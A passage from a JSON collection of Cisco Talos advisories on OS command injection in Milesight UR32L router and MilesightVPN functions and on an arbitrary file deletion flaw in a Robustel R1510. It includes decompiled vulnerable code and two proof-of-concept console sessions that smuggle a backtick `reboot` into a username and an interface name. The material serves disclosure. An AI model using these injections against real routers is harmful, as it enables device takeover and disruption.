vulnerability\n\n##### July 6, 2023\n\n##### CVE Number\n\nCVE-2023-23550\n\n##### SUMMARY\n\nAn OS command injection vulnerability exists in the ys_thirdparty user_delete functionality of Milesight UR32L v32.3.0.5. A specially crafted network packet can lead to command execution. An attacker can send a sequence of requests to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nMilesight UR32L v32.3.0.5\n\n##### PRODUCT URLS\n\nUR32L - <https://www.milesight-iot.com/cellular/router/ur32l/>\n\n##### CVSSv3 SCORE\n\n7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-77 - Improper Neutralization of Special Elements used in a Command (\u2018Command Injection\u2019)\n\n##### DETAILS\n\nThe Milesight UR32L is an industrial cellular router. The router features include support for multiple VPNs, a router console shell, firewall and many others.\n\nThe router offers telnet and sshd services. Both, when provided with the correct credentials, will allow access to the router console. This is an interactive shell to modify the router settings.\n\nHere is the prompt after the login:\n \n \n *** TERMINFO:/etc/terminfo TERM:linux *****\n -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--\n \n -------------------------------------------------------------------------\n Product Model : UR32L\n Firmware Version : 32.3.0.5\n -------------------------------------------------------------------------\n \n ROUTER> \n \n\nThe service has several functionalities. The number of functionalities depends on the user privileges. The admin user can access the `enable` command, which will allow access to a high privilege command menu:\n \n \n ROUTER> enable \n ROUTER# \n cellular-gps-dev\n clear Reset functions\n configure Configuration from vty interface\n copy Copy from one file to another\n core Set debug level\n debug Debugging functions (see also 'undebug')\n disable Turn off privileged mode command\n enable Turn on privileged mode command\n end End current mode and change to enable mode\n exit Exit current mode and down to previous mode\n list Print command list\n modbus-master\n no Negate a command or set its defaults\n ping Send echo messages\n quit Exit current mode and down to previous mode\n reload Halt and perform a cold restart\n show Show running system information\n ssh Open an ssh connection\n telnet Open a telnet connection\n terminal Set terminal line parameters\n test Test\n traceroute Trace route to destination\n undebug Disable debugging functions (see also 'debug')\n write Write running configuration to memory, network, or terminal\n \n\nIssuing the `configure terminal` command makes it possible to access the `user_permission` command. This allows access to a menu where it is possible to manage user-related information:\n \n \n ROUTER(user-permission)# \n end End current mode and change to enable mode\n exit Exit current mode and down to previous mode\n list Print command list\n no remove the user\n show show the user information\n superuser set superuser name or password\n user check the user password\n \n\nThe `no user <username>` command removes the user associated with the issued username. This command is manage by the `ys_thirdparty`\u2019s `user_delete` function:\n \n \n undefined4 user_delete(undefined4 param_1,undefined4 param_2,undefined4 param_3,char **argv)\n \n {\n [... variable declaration ...]\n \n username = *argv;\n iVar1 = strcmp(username,superuser);\n if (iVar1 == 0) {\n username = \"[failed]:can not remove superuser!\\n\";\n }\n else {\n iVar1 = delete_user_real(username,0);\n [...]\n }\n [...]\n }\n \n\nIf the username provided is not the superuser, this function will call the `delete_user_real` function:\n \n \n uint delete_user_real(char *username,uint is_delete_super_user)\n \n {\n [... variable declaration ...]\n \n [...]\n is_superuser = strcmp(username,superuser);\n if ((is_superuser | is_delete_super_user) == 0) {\n tmp_var = 1;\n }\n else {\n [...]\n tmp_var = check_system_user(username);\n [...]\n }\n [...]\n }\n \n\nThis one, after a check about the superuser, could call the `check_system_user` with the provided username:\n \n \n void check_system_user(char *user)\n \n {\n [... variable declaration ...]\n \n iVar1 = __stack_chk_guard;\n popen_command._0_4_ = 0;\n memset(popen_command + 4,0,0xfc);\n snprintf(popen_command,0x100,\"%s chk 0 %s\",\"/usr/sbin/userpermit.sh\",user); [1]\n __stream = popen(popen_command,\"r\"); [2]\n [...]\n }\n \n\nThis function will compose, at `[1]`, the `\"/usr/sbin/userpermit.sh chk 0 <username>\"` string and use it as argument for the popen function at `[2]`. From the `user_delete` function until the popen call at `[2]` there is no check for the username provided, so this can lead to a command injection vulnerability at `[2]`.\n\n### Exploit Proof of Concept\n\nFollowing a POC triggering a reboot of the system through the command injection exposes above:\n \n \n *** TERMINFO:/etc/terminfo TERM:linux *****\n -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--\n \n -------------------------------------------------------------------------\n Product Model : UR32L\n Firmware Version : 32.3.0.5\n -------------------------------------------------------------------------\n \n ROUTER> enable\n ROUTER# configure terminal\n ROUTER(config)# user_permission\n ROUTER(user-permission)# no user `reboot`\n ROUTER(user-permission)# Connection closed by foreign host.\n \n\nThe `Connection closed by foreign host.` is the consequence of the device rebooting\n\n##### VENDOR RESPONSE\n\nSince the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco\u2019s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html\n\n##### TIMELINE\n\n2023-02-14 - Initial Vendor Contact \n2023-02-21 - Vendor Disclosure \n2023-07-06 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2023-1706\n\nPrevious Report\n\nTALOS-2023-1698\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-06T00:00:00", "type": "talos", "title": "Milesight UR32L ys_thirdparty user_delete OS command injection vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "MULTIPLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-23550"], "modified": "2023-07-06T00:00:00", "id": "TALOS-2023-1694", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1694", "cvss": {"score": 5.8, "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T19:04:39", "description": "# Talos Vulnerability Report\n\n### TALOS-2023-1698\n\n## Milesight UR32L libzebra.so bridge_group OS command injection vulnerability\n\n##### July 6, 2023\n\n##### CVE Number\n\nCVE-2023-22306\n\n##### SUMMARY\n\nAn OS command injection vulnerability exists in the libzebra.so bridge_group functionality of Milesight UR32L v32.3.0.5. A specially crafted network packet can lead to command execution. An attacker can send a sequence of requests to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nMilesight UR32L v32.3.0.5\n\n##### PRODUCT URLS\n\nUR32L - <https://www.milesight-iot.com/cellular/router/ur32l/>\n\n##### CVSSv3 SCORE\n\n7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-77 - Improper Neutralization of Special Elements used in a Command (\u2018Command Injection\u2019)\n\n##### DETAILS\n\nThe Milesight UR32L is an industrial cellular router. The router features include support for multiple VPNs, a router console shell, firewall and many others.\n\nThe router offers telnet and sshd services. Both, when provided with the correct credentials, will allow access to the router console. This is an interactive shell to modify the router settings.\n\nHere is the prompt after the login:\n \n \n *** TERMINFO:/etc/terminfo TERM:linux *****\n -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--\n \n -------------------------------------------------------------------------\n Product Model : UR32L\n Firmware Version : 32.3.0.5\n -------------------------------------------------------------------------\n \n ROUTER> \n \n\nThe service has several functionalities. The number of functionalities depends on the user privileges. Indeed, the admin user can access the `enable` command, which will allow access to a high privilege command menu:\n \n \n ROUTER> enable \n ROUTER# \n cellular-gps-dev\n clear Reset functions\n configure Configuration from vty interface\n copy Copy from one file to another\n core Set debug level\n debug Debugging functions (see also 'undebug')\n disable Turn off privileged mode command\n enable Turn on privileged mode command\n end End current mode and change to enable mode\n exit Exit current mode and down to previous mode\n list Print command list\n modbus-master\n no Negate a command or set its defaults\n ping Send echo messages\n quit Exit current mode and down to previous mode\n reload Halt and perform a cold restart\n show Show running system information\n ssh Open an ssh connection\n telnet Open a telnet connection\n terminal Set terminal line parameters\n test Test\n traceroute Trace route to destination\n undebug Disable debugging functions (see also 'debug')\n write Write running configuration to memory, network, or terminal\n \n\nIssuing the `configure terminal` command permits access to the `interface <interface_name>` command that configures a network interface. Several configuration are available for the interfaces; one of them is the command `bridge-group <1-10>` that is used to add the interface to a bridge.\n\nAn example of using this functionality follows:\n \n \n ROUTER> enable \n ROUTER# configure terminal \n ROUTER(config)# interface eth4\n ROUTER(config-if)# bridge-group 2\n \n\nThis will add eth4 to the bridge number 2. The function responsible for managing the `bridge-group` command is the `libzebra.so.0.0.0`\u2019s `bridge_group` function:\n \n \n void bridge_group(undefined4 param_1,interface_struct *interface_struct,undefined4 param_3,\n char **argv)\n \n {\n [... variable declaration ...]\n \n puVar6 = (undefined4 *)0x0;\n local_2c = __stack_chk_guard;\n interface_name = interface_struct->interface_name; [1]\n bridge_group_n = atoi(*argv);\n piVar5 = (int *)0x0;\n memset(ifconfig_command,0,0x40);\n snprintf(ifconfig_command,0x40,\"ifconfig %s 0.0.0.0\",interface_name); [2]\n system(ifconfig_command); [3]\n [...]\n }\n \n\nAt `[1]`, the `<interface_name>` provided is fetched (in the example above, it is eth4). At `[2]` the `ifconfig <interface_name> 0.0.0.0` string is composed and then used as argument of the `system` function at `[3]`. Because the `<interface_name>` is eventually used in the `system` function, the `bridge_group` is vulnerable to a command injection vulnerability.\n\n### Exploit Proof of Concept\n\nFollowing a POC triggering a reboot of the system through the command injection exposes above:\n \n \n *** TERMINFO:/etc/terminfo TERM:linux *****\n -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--\n \n -------------------------------------------------------------------------\n Product Model : UR32L\n Firmware Version : 32.3.0.5\n -------------------------------------------------------------------------\n \n ROUTER> enable \n ROUTER# configure terminal \n ROUTER(config)# interface `reboot`\n ROUTER(config-if)# bridge-group 2\n bridge.c:366 bridge_group: use command 'bridge <1-10>' to creates a new ethernet bridge!\n ROUTER(config-if)# Connection closed by foreign host.\n \n\nThe `Connection closed by foreign host.` is the consequence of the device rebooting.\n\n##### VENDOR RESPONSE\n\nSince the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco\u2019s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html\n\n##### TIMELINE\n\n2023-02-14 - Initial Vendor Contact \n2023-02-21 - Vendor Disclosure \n2023-07-06 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2023-1694\n\nPrevious Report\n\nTALOS-2023-1699\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-06T00:00:00", "type": "talos", "title": "Milesight UR32L libzebra.so bridge_group OS command injection vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "MULTIPLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-22306"], "modified": "2023-07-06T00:00:00", "id": "TALOS-2023-1698", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1698", "cvss": {"score": 5.8, "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T19:04:35", "description": "# Talos Vulnerability Report\n\n### TALOS-2023-1703\n\n## Milesight MilesightVPN liburvpn.so create_private_key OS command injection vulnerability\n\n##### July 6, 2023\n\n##### CVE Number\n\nCVE-2023-22371\n\n##### SUMMARY\n\nAn os command injection vulnerability exists in the liburvpn.so create_private_key functionality of Milesight VPN v2.0.2. A specially-crafted network request can lead to command execution. An attacker can send a malicious packet to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nMilesight VPN v2.0.2\n\n##### PRODUCT URLS\n\nMilesightVPN - <https://www.milesight-iot.com/milesightvpn/>\n\n##### CVSSv3 SCORE\n\n8.1 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - chain: TALOS-2023-1702 \n##### CWE\n\nCWE-77 - Improper Neutralization of Special Elements used in a Command (\u2018Command Injection\u2019)\n\n##### DETAILS\n\nThe MilesightVPN is a software that make easier the setup of VPN tunnel for the Milesight products and allow to monitor the connection status with a web server interface.\n\nThe MilesightVPN exposes the `/Device_Auth` API for the various Milesight devices for them to authenticate to the server and to get an OpenVPN configuration. The API is managed by the `Device_Auth` function:\n \n \n function Device_Auth(res,postdata,connection){\n var authcode=postdata['authcode'],subnet=postdata['subnet'],\\\n devicename=postdata['device_name'],sn=postdata['sn'];\n var newdt=dll_fun('get_openvpn_params',{});\n [...]\n if(newdt['result']['auth_code']!=authcode)\n {\n [...]\n }\n else\n {\n var $sql='select * from device where sn=\"'+sn+'\"';\n connection.query($sql).then(function(data){\n if(data['error'])\n {\n [... error branch ...]\n }\n else\n {\n if(data['result'].length>0)\n {\n [...]\n }\n else\n {\n [...]\n $sql1='insert into device(name,sn,remote_subnet,status) \\\n value(\"'+devicename+'\",\"'+sn+'\",\"'+subnet+'\",0)';\n connection.query($sql1).then(function(data1){\n if(data1['error'])\n {\n [...]\n }\n else\n {\n var newdt3=dll_fun('register_client',{'cn':sn,'subnet':subnet}); [1]\n [...]\n }\n })\n }\n }\n })\n }\n }\n \n\nThis API expects four entries in the POST payload: \\- authcode: is a secret generated by the MilesightVPN \\- subnet: the subnet mask of the main network used by the device \\- device_name: the identifier of the device that is connecting to the MilesightVPN server \\- sn: is the serial number of the device that is connecting to the MilesightVPN server\n\nEventually the function will reach the code at `[1]` that will call a function of the `liburvpn.so` library. In this case the function called is `liburvpn.so`\u2019s `register_a_client` that takes one JSON object as argument, the object has the `sn` and the `subnet` as entry values.\n\nFollowing the `liburvpn.so`\u2019s `register_a_client` function:\n \n \n cJSON * register_a_client(cJSON *params)\n \n {\n [... variable declaration ...]\n \n [... variable initialization ...]\n for (obj = params->child; obj != (cJSON *)0x0; obj = obj->next) {\n iVar1 = strcmp(obj->string,\"cn\");\n if (iVar1 == 0) {\n common_name = obj->valuestring;\n }\n else {\n iVar1 = strcmp(obj->string,\"subnet\");\n if (iVar1 == 0) {\n subnet = obj->valuestring;\n }\n }\n }\n if ((common_name == (char *)0x0) || (subnet == (char *)0x0)) {\n [...]\n }\n else {\n [...]\n type = check_common_name(common_name);\n if (type == 0) {\n device_max = get_clients_limit();\n snprintf(cmd,0x80,\"echo \\\"device max:%d\\\" >> /var/urvpn.log\",(ulong)(uint)device_max);\n system(cmd);\n print_timestamp();\n printf(\"Register a router(%s)\\n\",common_name);\n [...]\n update_subnet(common_name,subnet);\n ret = register_a_router(common_name,ip,mask); [2]\n }\n [...]\n }\n [...]\n }\n \n\nThe function will perform various checks and eventually, if no error is encountered and the device is recognized as router, the function `register_a_router`, at `[2]`, will be called. The `register_a_router` function will generate the cryptographic keys used for the VPN connection.\n \n \n int register_a_router(char *cn,char *ip,char *mask)\n \n {\n [...]\n iVar1 = general_keys(\"./urvpn/routers_ca\",cn);\n return iVar1;\n }\n \n\nThe `register_a_router` function will call the `general_keys` function, that is the one that is effectively going to generate the cryptographic keys:\n \n \n int general_keys(char *path,char *name)\n \n {\n [... variable declaration ...]\n \n \n is_name_0_string = strcmp(name,\"000000000000\");\n if (is_name_0_string == 0) {\n [...]\n }\n else {\n snprintf(public_name,0x200,\"%s/%s.csr\",path,name);\n snprintf(private_name,0x200,\"%s/%s.key\",path,name);\n snprintf(certificate_name,0x200,\"%s/%s.crt\",path,name);\n }\n private_name_path_exists = check_file_exist(private_name); [3]\n if (private_name_path_exists == 0) {\n print_timestamp();\n printf(\"create file private %s\\n\",private_name);\n create_private_key(private_name); [4]\n }\n [...]\n }\n \n\nThis function will have as the `name` parameter the original `sn`, the serial number of the device. If this is not `000000000000`, then various path-names are composed. We are going to focus on the `private_name` variable that is going to have the following form `./urvpn/routers_ca/<serial number>`, at `[3]` it is checked if this pathname corresponds to an existing file, if this file does not exists the `create_private_key` function will be called at `[4]`:\n \n \n void create_private_key(char *private_name)\n \n {\n [...]\n snprintf(cmd,0x200,\"openssl genrsa -out %s 1024\",private_name); [5]\n print_timestamp();\n printf(\"create private key:%s\\n\",cmd);\n system(cmd);\n [...]\n }\n \n\nThis function, for the code path considered, will execute `system(\"openssl genrsa -out ./urvpn/routers_ca/<serial number> 1024\");`. Because the serial number variable, originally `sn` and then called `cn` in the `liburvpn.so` library, is never checked until `[5]`, the `/Device_Auth` API can lead to an OS command injection in `liburvpn.so` at `[5]`. An attacker would need to know the Authorization Code of the server to actually use the `/Device_Auth` API. But because TALOS-2023-1702 this information can be easily retrieved by an attacker.\n\n##### VENDOR RESPONSE\n\nSince the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco\u2019s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html\n\n##### TIMELINE\n\n2023-02-14 - Initial Vendor Contact \n2023-02-21 - Vendor Disclosure \n2023-07-06 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2023-1704\n\nPrevious Report\n\nTALOS-2023-1700\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-06T00:00:00", "type": "talos", "title": "Milesight MilesightVPN liburvpn.so create_private_key OS command injection vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-22371"], "modified": "2023-07-06T00:00:00", "id": "TALOS-2023-1703", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1703", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-11T18:54:22", "description": "# Talos Vulnerability Report\n\n### TALOS-2023-1714\n\n## Milesight UR32L vtysh_ubus tcpdump_start_cb OS command injection vulnerability\n\n##### July 6, 2023\n\n##### CVE Number\n\nCVE-2023-22653\n\n##### SUMMARY\n\nAn OS command injection vulnerability exists in the vtysh_ubus tcpdump_start_cb functionality of Milesight UR32L v32.3.0.5. A specially crafted HTTP request can lead to command execution. An authenticated attacker can send an HTTP request to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nMilesight UR32L v32.3.0.5\n\n##### PRODUCT URLS\n\nUR32L - <https://www.milesight-iot.com/cellular/router/ur32l/>\n\n##### CVSSv3 SCORE\n\n8.8 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-78 - Improper Neutralization of Special Elements used in an OS Command (\u2018OS Command Injection\u2019)\n\n##### DETAILS\n\nThe Milesight UR32L is an industrial cellular router. The router features include support for multiple VPNs, a router console shell, firewall and many others.\n\nThe Milesight router offers several functionalities through the `/cgi` endpoint. The \u201ccore\u201d functionality we are considering is called `yruo_tools`. In this \u201ccore\u201d there is one function called \u201ctcpdump_start\u201d. This API is used to execute the command \u201ctcpdump\u201d using the provided data, following the `vtysh_ubus`\u2019s `tcpdump_start_cb` function, responsible for managing the \u201ctcpdump_start\u201d functionality:\n \n \n void tcpdump_start_cb(undefined4 param_1,undefined4 param_2,undefined4 param_3,undefined4 param_4,\n undefined4 *param_5)\n \n {\n [... variable declaration ...]\n \n [... variable initialization ...]\n [...]\n if ((param_advanced == (blob_attr *)0x0) ||\n (advanced_value = (char *)blobmsg_get_string(param_advanced), *advanced == '\\0')) {\n [...]\n interface_value = (char *)blobmsg_get_string(param_interface]);\n [...]\n strncpy(interface_ptr,interface_value,0x80);\n snprintf(last_param.interface,0x80,\"%s\",interface_ptr);\n is_equal = strcmp(interface_ptr,\"Any\");\n if (is_equal == 0) {\n interface_ptr = \"any\";\n interface_ptr_dup = zstrdup(1,interface_ptr);\n }\n else {\n interface_ptr_dup = if_name_display2ori(interface_ptr);\n [...]\n }\n snprintf(tcpdump_options_string,0x100,\"-i %s\",interface_ptr_dup);\n [...]\n if (0 < (int)port) {\n last_param.port = port;\n len = strlen(tcpdump_options_string);\n snprintf(tcpdump_options_string + len,0x100 - len,\" port %d\",port); [1]\n }\n [...]\n if (param_ip != (blob_attr *)0x0) {\n ip_value = (char *)blobmsg_get_string(param_ip);\n strncpy(host_string,ip_value,0x80);\n if (*host_string != 0) {\n snprintf(last_param.host,0x80,\"%s\",host_string);\n len = strlen(tcpdump_options_string);\n if ((int)port < 0) {\n temp = \"\";\n }\n else {\n temp = \" and\";\n }\n snprintf(tcpdump_options_string + len,0x100 - len,\"%s host %s\",temp,host_string); [2]\n }\n }\n [...]\n }\n else {\n strncpy(advanced_param_buff,advanced_value,0x100);\n strtok(advanced_param_buff,\";\");\n strtok(advanced_param_buff,\"|\");\n temp = advanced_param_buff._0_4_ & 0xff;\n if (temp != 0) {\n snprintf(last_param.advance,0x100,\"%s\",advanced_param_buff);\n snprintf(tcpdump_options_string,0x100,\" %s\",advanced_param_buff); [3]\n [...]\n }\n }\n [... populate the dest_location variable with the destination of the recorded pcap ...]\n [...]\n len = strlen(tcpdump_options_string);\n snprintf(tcpdump_options_string + len,0x100 - len,\" -w %s\",dest_location);\n snprintf(shell_command,0x200,\"%s %s \\\"%s\\\" \\\"%s\\\" \\\"%s\\\" 2>&1 &\",\"/usr/sbin/webtools.sh\",\"tcpdump\"\n ,tcpdump_options_string,dest_location,\"/tmp/webtcpdump.lock\"); [4]\n [...]\n system(shell_command); [5]\n [...]\n }\n \n\nThis function parses, at most, four possible params: \u201cinterface\u201d, \u201cip\u201d, \u201cport\u201d and \u201cadvanced\u201d. If the \u201cadvanced\u201d param is present and not empty, the other three are ignored. Otherwise, if the \u201cadvanced\u201d param is not present or its value is empty, then the function will parse the \u201cinterface\u201d, \u201cip\u201d and \u201cport\u201d.\n\nEventually the code at `[4]` is reached and the string `'/usr/sbin/webtools.sh tcpdump \"<tcpdump_options_string>\" \"dest_location\" \"/tmp/webtcpdump.lock\" 2>&1 &'` is composed. The `tcpdump_options_string` is composed using the provided parameters. For instance, at `[1]` is appended the `' port <port>'` string, and at `[2]` the `' host <host>'` or `' and host <host>'` is appended, based on the presence of the \u201cport\u201d parameter. Otherwise, if the \u201cadvanced\u201d parameter is present, neither `[1]` or `[2]` are reached, but instead the code at `[3]` is executed.\n\nFollowing are two example of commands that will result in the same composed string. Note that these commands must be sent by an authenticated user.\n \n \n {\n \"id\":60,\n \"execute\":1,\n \"core\":\"yruo_tools\",\n \"function\":\"tcpdump_start\",\n \"values\":[\n {\n \"interface\":\"Any\",\n \"ip\":\"192.168.0.100\",\n \"port\":12345,\n \"advanced\":\"\"\n }\n ]\n }\n \n\nThe above command uses the \u201cinterface\u201d, \u201cip\u201d and \u201cport\u201d params.\n \n \n {\n \"id\":60,\n \"execute\":1,\n \"core\":\"yruo_tools\",\n \"function\":\"tcpdump_start\",\n \"values\":[\n {\n \"interface\":\"\",\n \"ip\":\"\",\n \"port\":\"\",\n \"advanced\":\"-i any port 12345 and host 192.168.0.100\"\n }\n ]\n }\n \n\nThe above command uses only the \u201cadvanced\u201d param.\n\nEventually the string composed at `[4]` will be used as argument of the `system` function at `[5]`. No particular checks are performed against the parameters provided, which can lead to an OS command injection.\n\n##### VENDOR RESPONSE\n\nSince the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco\u2019s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html\n\n##### TIMELINE\n\n2023-02-14 - Initial Vendor Contact \n2023-02-21 - Vendor Disclosure \n2023-07-06 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2023-1715\n\nPrevious Report\n\nTALOS-2023-1716\n", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-07-06T00:00:00", "type": "talos", "title": "Milesight UR32L vtysh_ubus tcpdump_start_cb OS command injection vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-22653"], "modified": "2023-07-06T00:00:00", "id": "TALOS-2023-1714", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1714", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T18:56:21", "description": "### Summary\n\nA data removal vulnerability exists in the web_server /action/remove/ API functionality of Robustel R1510 3.3.0. A specially-crafted network request can lead to arbitrary file deletion. An attacker can send a sequence of requests to trigger this vulnerability.\n\n### Tested Versions\n\nRobustel R1510 3.3.0\n\n### Product URLs\n\nR1510 - <https://www.robustel.com/en/product/r1510-industrial-cellular-vpn-router/>\n\n### CVSSv3 Score\n\n8.7 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:H\n\n### CWE\n\nCWE-20 - Improper Input Validation\n\n### Details\n\nThe R1510 is an industrial cellular router. It offers several advanced software like an innovative use of Open VPN, Cloud management, data over-use guard, smart reboot and others.\n\nThe R1510 has a web server that manages several APIs. One of these API is `/ajax/remove/`. This function allows to remove files, checking for possible path traversal in the provided input.\n\nHere it is the function that handles the `/ajax/remove/` API:\n \n \n undefined4 /ajax/remove/(Webs *webs)\n \n {\n [...]\n \n [...]\n file_name = (char *)websGetVar(webs,\"file_name\",0); [1]\n if ((file_name != (char *)0x0) &&\n (shell_command = strstr(file_name,\"..\"), shell_command == (char *)0x0)) { [2]\n shell_command = (char *)sfmt(\"rm %s -rf\",file_name); [3]\n iVar1 = system(shell_command);\n [...]\n }\n \n\nAt `[1]` the variable `file_name` is fetched and then used, at `[3]`, to create the string `rm <file_name> -rf`. The function checks, at `[2]`, if the provided `filen_name` contains `..`. This check, allegedly, is used to prevent path traversal. But because `file_name` can be an absolute path, an attacker, able to control `file_name` would be able to delete arbitrary file and directory.\n\n### Timeline\n\n2022-06-27 - Initial vendor contact \n2022-06-28 - Vendor Disclosure \n2022-06-30 - Public Release \n\n", "cvss3": {"exploitabilityScore": 3.9, 